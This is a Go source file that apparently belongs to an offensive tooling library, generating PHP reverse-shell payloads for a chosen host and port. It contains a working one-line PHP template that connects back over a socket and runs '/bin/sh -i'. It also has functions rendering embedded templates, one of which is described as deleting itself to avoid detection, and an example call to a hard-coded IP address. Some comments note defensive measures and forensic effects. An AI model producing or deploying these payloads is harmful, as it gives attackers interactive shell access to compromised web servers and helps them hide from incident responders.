package reverse
import (
_ "embed"
"fmt"
"strings"
)
// Payload templates for the PHP reverse shells. They are exported, mutable package variables
// that the PHPPayload methods in this file pass to fmt.Sprintf as format strings, so a literal
// '%' inside a template has to be written as "%%".
var (
	// PHPDefault is the template formatted by LinuxInteractive (and therefore by Default).
	// It is initialised to PHPLinuxInteractive; reassigning it changes the output of both methods.
	PHPDefault = PHPLinuxInteractive
	// PHPLinuxInteractive takes a host (%s) and a port (%d). The generated PHP opens a socket
	// with fsockopen and hands it to proc_open as stdin, stdout and stderr of "/bin/sh -i".
	// The host is placed inside a double-quoted PHP string without any escaping.
	// Seen from the defending side, this is a PHP process spawning "/bin/sh -i" with a socket as
	// its standard descriptors; listing proc_open or fsockopen in php.ini's disable_functions
	// stops this template from working.
	PHPLinuxInteractive = `<?php $sock=fsockopen("%s",%d);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>`
	// PHPUnflattened is filled at build time from php/unflattened.php (contents not shown in
	// this file). Unflattened formats it with a single %s argument, the connect-back address.
	//go:embed php/unflattened.php
	PHPUnflattened string
	// PHPUnflattenedSelfDelete is filled at build time from php/unflattened_self_delete.php
	// (contents not shown in this file). UnflattenedSelfDelete formats it with a single %s
	// argument, the connect-back address.
	//go:embed php/unflattened_self_delete.php
	PHPUnflattenedSelfDelete string
)
// Default returns the package's default PHP reverse-shell payload for lhost:lport.
// It delegates to LinuxInteractive and strips leading and trailing CR/LF characters from the
// result (LinuxInteractive already trims, so this second pass is a no-op kept for parity).
func (php *PHPPayload) Default(lhost string, lport int) string {
	payload := php.LinuxInteractive(lhost, lport)

	return strings.Trim(payload, "\r\n")
}
// LinuxInteractive renders the short PHP payload that connects to lhost:lport and runs
// /bin/sh -i over that socket, with leading and trailing CR/LF characters removed.
//
// lhost and lport are substituted into the PHP source as-is: lhost ends up inside a
// double-quoted PHP string and is neither validated nor escaped here, so callers are
// responsible for passing a plain host name or address.
//
// NOTE(review): the template is read from PHPDefault rather than PHPLinuxInteractive. The two
// start out identical, but reassigning PHPDefault also changes this method's output; confirm
// that is intended.
func (php *PHPPayload) LinuxInteractive(lhost string, lport int) string {
	rendered := fmt.Sprintf(PHPDefault, lhost, lport)

	return strings.Trim(rendered, "\r\n")
}
// Unflattened renders the embedded php/unflattened.php template into a PHP reverse shell that
// connects back to lhost:lport. The template is not part of this file; it is described as
// autodetecting the operating system and selecting cmd.exe or /bin/sh accordingly.
//
// Encryption is optional and chosen by the caller: when encrypted is true the connect-back
// address is prefixed with "tls://", otherwise the bare "host:port" is used (presumably a
// plain-text TCP connection; confirm against the template). How the template validates the
// TLS peer, if at all, is not visible here.
//
// lhost is substituted into the PHP source without validation or escaping, and leading and
// trailing CR/LF characters are trimmed from the result.
//
//	reverse.PHP.Unflattened("10.9.49.80", 1270, true)
func (php *PHPPayload) Unflattened(lhost string, lport int, encrypted bool) string {
	scheme := ""
	if encrypted {
		scheme = "tls://"
	}
	target := fmt.Sprintf("%s%s:%d", scheme, lhost, lport)
	rendered := fmt.Sprintf(PHPUnflattened, target)

	return strings.Trim(rendered, "\r\n")
}
// UnflattenedSelfDelete renders the embedded php/unflattened_self_delete.php template. It
// takes the same arguments as Unflattened and builds the connect-back address the same way:
// "host:port", prefixed with "tls://" only when encrypted is true.
//
// The template is not part of this file; it is described as attempting to delete itself and
// registering destructors that remove the file from disk when the command exits. For incident
// response this means the script may no longer be on disk at triage time, leaving web-server
// logs and process or network telemetry as the evidence of its use.
//
// lhost is substituted into the PHP source without validation or escaping, and leading and
// trailing CR/LF characters are trimmed from the result.
func (php *PHPPayload) UnflattenedSelfDelete(lhost string, lport int, encrypted bool) string {
	scheme := ""
	if encrypted {
		scheme = "tls://"
	}
	target := fmt.Sprintf("%s%s:%d", scheme, lhost, lport)
	rendered := fmt.Sprintf(PHPUnflattenedSelfDelete, target)

	return strings.Trim(rendered, "\r\n")
}